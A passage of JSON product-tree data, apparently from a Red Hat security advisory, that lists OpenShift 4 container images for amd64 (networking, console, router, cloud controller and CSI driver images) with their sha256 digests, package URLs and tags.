"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3A5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3Aa0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849379"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Aeca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847787"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3A679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849485"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:aa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3Aaa0e17fffcbd91951c877b5f4c9287a68f1732f69fda71c9313c38111352e113?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3Af3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846953"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849670"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3A55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849553"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3A1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Aafb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850450"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3A130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3A1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849386"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3A7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847640"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847832"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3A576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848580"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3Acee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3A0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849682"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3A480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848754"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848221"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cloud-controller-manager-rhel9@sha256%3Acb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844630"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cluster-api-controllers-rhel9@sha256%3A7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844763"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9@sha256%3A07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844635"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9-operator@sha256%3A9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844553"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-pod-identity-webhook-rhel9@sha256%3Aaa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844591"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-controller-manager-rhel9@sha256%3Af96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844665"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-node-manager-rhel9@sha256%3A5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cluster-api-controllers-rhel9@sha256%3A20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9@sha256%3Ad2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9-operator@sha256%3Af18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844592"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3Add52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847491"
}
}
},
{
"category": "product_version",
